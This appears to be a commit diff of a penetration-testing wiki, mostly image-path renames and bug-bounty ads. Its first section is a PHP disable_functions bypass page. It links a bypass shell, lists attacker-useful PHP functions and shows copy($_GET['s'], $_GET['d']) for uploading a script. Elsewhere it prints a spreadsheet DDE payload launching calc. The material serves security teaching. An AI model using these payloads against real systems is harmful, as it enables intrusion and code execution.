* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
## **ALL IN ONE**
### **Automatic Tool**
The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
The following script tries some of the methods commented here:\
[https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
# Other Interesting PHP functions
## Other Interesting PHP functions
## List of functions which accept callbacks
### List of functions which accept callbacks
These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.\
Function => Position of callback arguments\
@ -662,7 +663,7 @@ Function => Position of callback arguments\
'sqlite\_create\_aggregate' => array(2, 3),\
'sqlite\_create\_function' => 2,
## Information Disclosure
### Information Disclosure
Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.\
**phpinfo**\
@ -683,7 +684,7 @@ Most of these function calls are not sinks. But rather it maybe a vulnerability
**getmypid**\
**getmyuid**
## Other
### Other
**extract** - Opens the door for register\_globals attacks (see study in scarlet).\
**parse\_str** - works like extract if only one argument is given.\
@ -703,7 +704,7 @@ putenv\
**posix\_setsid**\
**posix\_setuid**
## Filesystem Functions
### Filesystem Functions
According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
@ -733,7 +734,7 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
**tempnam**\
**touch**\
**unlink**\
**imagepng** - 2nd parameter is a path.\
**imagepng** - 2nd parameter is a path.\
**imagewbmp** - 2nd parameter is a path.\
**image2wbmp** - 2nd parameter is a path.\
**imagejpeg** - 2nd parameter is a path.\
@ -802,7 +803,6 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
**php\_strip\_whitespace**\
**get\_meta\_tags**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -818,5 +818,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

2
network-services-pentesting/pentesting-web/wordpress.md
View File

@ -219,7 +219,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)

2
network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
View File

@ -41,7 +41,7 @@ Electron has 2 process types:
* Main Process (has complete access to NodeJS)
* Renderer Process (should have NodeJS restricted access for security reasons)
![](<../../../.gitbook/assets/image (307) (5).png>)
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
A **renderer process** will be a browser window loading a file:

4
pentesting-web/file-upload/README.md
View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -313,7 +313,7 @@ This helps to upload a file that complins with the format of several different f
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

2
pentesting-web/formula-doc-latex-injection.md
View File

@ -59,7 +59,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### More

4
pentesting-web/hacking-jwt-json-web-tokens.md
View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -262,7 +262,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
{% embed url="https://github.com/ticarpi/jwt_tool" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

4
pentesting-web/ldap-injection.md
View File

@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -239,7 +239,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

2
pentesting-web/saml-attacks/README.md
View File

@ -26,7 +26,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
## Tool

4
pentesting-web/sql-injection/postgresql-injection/README.md
View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -173,7 +173,7 @@ SELECT $TAG$hacktricks$TAG$;
```
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

2
windows-hardening/ntlm/places-to-steal-ntlm-creds.md
View File

@ -285,7 +285,7 @@ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
![](<../../.gitbook/assets/image (307).png>)
![](<../../.gitbook/assets/image (307) (5).png>)
## Powershell